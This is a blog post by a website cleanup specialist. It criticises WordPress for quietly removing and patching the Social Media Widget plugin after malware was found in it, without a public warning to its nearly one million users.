Have you ever logged in to your WordPress dashboard, noticed that there were some updates pending, but simply couldn’t be bothered pushing the button to run them? Sure you have. Who hasn’t? A good majority of my work comes from dehacking websites that have been compromised, and even I slack on that from time to time. I mean, if there are no security bulletins about the updates, and I am only using plugins I have downloaded directly from WordPress.org I should be fine, right?
Wrong.
The day before yesterday I rebuilt a client’s site that had ben hacked, grabbing fresh versions of all of the plugins he was using. I noticed that one of the plugins, Social Media Widget, didn’t download though, and when I went to investigate why I saw that it had been yanked from the WordPress repositories. Checking Google’s cache I could tell that it had only recently been removed, that the old download button still worked, and there were no warnings or messages as to why it was pulled anywhere I looked. I went ahead and grabbed a fresh copy, then posted on the support forums (which also gave no clues as to why it was gone) asking what was up with it:
http://wordpress.org/support/topic/anyone-know-why-social-media-widget-was-removed
A few hours later I got my answer: the plugin was infected with malware, so they had removed the plugin page altogether. According to Samuel Wood (Otto), one of the WordPress devs, they “forced an update” of the plugin to a version that they fixed:
Two things struck me as wrong about this. First, WordPress cannot “force” an update of a plugin to the users themselves, so Otto’s claim was misleading at best. They can only update the svn, which then let’s the user know that there is an update available (assuming that they log in to their dashboard of course). If the users do not see the update, or do not have reason to believe that there is an urgent reason to run it, then it will remain on their installations until they do. To give you an idea of how ineffectual that tactic is, if one relies solely on that for protecting the infected blogs, here is a screenshot of the distribution of the various active versions of the plugin from back on March 28th:
This shows that less than 10% of the almost 1 million users had upgraded to the most recent version of the plugin, which had been out for a month when this data was collected.
Second, why is it that until I actually posted this question, no word about this infected plugin was mentioned by WordPress? There was nothing on the WordPress.org blog, nothing on Twitter from any of the developers, nothing on the plugin’s support forum, and of course, aside from letting me know that there was an update, nothing in the WordPress dashboard, not even when I clicked on the “View version 4.0.1 details” link in my plugins screen:
In fact, the only place you will see any information related to this malware is if you run the update, navigate to the folder for the plugin, open the readme.txt in there, and scroll down to line 181:
== Changelog == = 4.0.1 = * Remove potentially malicious code.
And that’s the extent of what WordPress feels is necessary to warn it’s users that there was a exploited plugin that was distributed from the official plugin repositories. This isn’t one of those obscure, rarely used plugins, either. Before being yanked this plugin had been downloaded 940,776 times. Currently the remote file that was being included in the plugin merely contained some spam, and associated Javascript to hide the spam from normal view, but since the remote file itself is under control of someone who obviously is not brimming over with moral fortitude there is nothing saying that they couldn’t decide just as easily to swap the file out for something that spreads viruses. In such a case that would mean that everyone still unaware that they are hosting an infected plugin would suddenly be serving viruses to their audience. If you ask me the fact that there is a chance that could happen should be enough to put out a tad bit more of an alert than a single line in a reademe.txt that the majority of people will never read. WordPress, however, doesn’t seem to feel that way.
Even more disconcerting is what I found out a little bit after that. Once I got my answer in the thread I opened, Sucuri blogged about it, and Samuel left a few comments there as well, where he used the phrase “Normally in these cases” when referring to this incident:
This tells me that, regardless of how rare it happens, it appears to be WordPress’s policy that when an infected or compromised plugin makes it’s way into the repositories they quietly clean it up without any fanfare. Often times, unfortunately, this would be like closing the proverbial barn door after the horses got out, and stronger measures may be necessary (up to and including rebuilding the whole installation in some cases). The WordPress plugin repositories are supposed to be a trusted source. Not being more forthcoming when something like this happens borders on negligence, to put it bluntly.
I understand that in years past WordPress had quite the reputation as being a security risk, and that there is a certain amount of bad press associated with being upfront about incidents such as this. However, I hope that WordPress will eventually decide that potential public safety risks outweigh not wanting to look bad, will do the right thing, and will change their policies about publicly letting people know when these things happen.